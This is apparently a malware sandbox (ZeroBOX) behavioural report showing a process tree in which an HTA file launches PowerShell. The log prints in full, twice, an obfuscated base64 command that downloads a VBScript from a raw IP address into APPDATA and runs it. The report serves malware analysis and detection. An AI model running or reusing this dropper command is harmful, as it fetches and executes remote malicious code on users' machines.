| ZeroBOX

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\ienetworks.hta
2560
- cmd.exe "C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
  2660
  - powershell.exe poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
    2760
    - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
      2876
      - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFE75.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFE74.tmp"
        2932
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
      3032

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents